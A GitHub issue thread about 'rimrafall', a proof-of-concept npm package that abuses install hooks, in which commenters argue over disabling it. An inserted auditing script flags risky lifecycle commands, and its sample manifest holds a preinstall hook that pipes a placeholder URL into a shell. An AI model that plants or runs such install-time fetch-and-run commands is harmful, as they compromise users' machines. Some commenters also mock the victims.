joaojeronimo / rimrafall

npm install could be dangerous
https://www.kb.cert.org/vuls/id/319816
165 stars, 8 forks

Please stop it right now #3

Closed henvic closed 9 years ago

henvic commented 9 years ago

We all know it's not safe and you've proved your point.

Please consider that people might install it not knowing the consequences and lose work. So, please, stop it right now.

Just comment out the line or add an 'echo ' in front so that the command never runs, and replace the package.

henvic commented 9 years ago

Or you can remove the rimrafall package directory itself, or something else that doesn't have the potential to mess up people's lives. Please consider this responsible-disclosure advice.
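The workaround above relies on how npm lifecycle hooks work: any `preinstall`, `install`, `postinstall` or `prepare` entry under `scripts` in a package's package.json is executed as a shell command by `npm install`, so prefixing it with `echo ` turns it into harmless output. The script below is an added example, not code from the rimrafall repository or from npm; it reads a package.json text, lists the install-time hooks, flags commands matching a small, assumed list of risky patterns, and recognises the `echo ` prefix as neutralized. The sample package.json is constructed for illustration and is not the real rimrafall manifest.

```javascript
// Added example, not part of the rimrafall repository.
// Inspect the lifecycle scripts a package would run during `npm install`
// before actually installing it.

// Hooks that npm runs during installation of a dependency.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Patterns a reviewer would want flagged. This list is an assumption for the
// example, not an official npm list.
const SUSPICIOUS = [
  /\brm\s+-[a-zA-Z]*r[a-zA-Z]*\b/,   // recursive delete
  /\bcurl\b.*\|\s*(ba)?sh\b/,         // pipe remote content into a shell
  /\bwget\b.*\|\s*(ba)?sh\b/,
  /\beval\b/,
  /\bsudo\b/,
];

// Return only the install-time hooks declared in a package.json text.
function lifecycleScripts(pkgJsonText) {
  const pkg = JSON.parse(pkgJsonText);
  const scripts = pkg.scripts || {};
  const hooks = {};
  for (const name of INSTALL_HOOKS) {
    if (typeof scripts[name] === "string") hooks[name] = scripts[name];
  }
  return hooks;
}

// A hook prefixed with `echo ` (the workaround suggested in the thread) never
// executes the original command, so it is reported as neutralized rather
// than suspicious. Any other hook matching a pattern is flagged.
function auditScripts(pkgJsonText) {
  const findings = [];
  for (const [hook, cmd] of Object.entries(lifecycleScripts(pkgJsonText))) {
    const neutralized = /^\s*echo\s/.test(cmd);
    const suspicious = !neutralized && SUSPICIOUS.some((re) => re.test(cmd));
    findings.push({ hook, cmd, neutralized, suspicious });
  }
  return findings;
}

function hasSuspiciousHook(pkgJsonText) {
  return auditScripts(pkgJsonText).some((f) => f.suspicious);
}

// Constructed sample manifest, NOT the real rimrafall package.json.
// The URL is a placeholder under the reserved .invalid TLD.
const SAMPLE = JSON.stringify({
  name: "example-pkg",
  version: "1.0.0",
  scripts: {
    preinstall: "curl -s https://example.invalid/setup.sh | sh",
    postinstall: "node ./scripts/setup.js",
    test: "node test.js",
  },
});

// The same manifest after applying the "add an echo in front" workaround.
const SAMPLE_ECHOED = SAMPLE.replace(
  '"curl -s https://example.invalid/setup.sh | sh"',
  '"echo curl -s https://example.invalid/setup.sh | sh"'
);

if (typeof require !== "undefined" && require.main === module) {
  for (const f of auditScripts(SAMPLE)) console.log(f);
  for (const f of auditScripts(SAMPLE_ECHOED)) console.log(f);
}
```

To apply this to a published package without installing it, `npm view <pkg> scripts` prints the `scripts` object from the registry manifest, and `npm install --ignore-scripts <pkg>` installs without running any lifecycle hooks at all, which is the safer default while you review them.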

sarciszewski commented 9 years ago

:-1: keep it up maybe we can actually educate some users the hard way!

ErikPeterson commented 9 years ago

@henvic anyone who would install a package without reading even a single line of its readme deserves what they get

joaojeronimo commented 9 years ago

I wanted it to be solved by npm, but all they did was take it off npm. That and having an echo doesn't solve anything.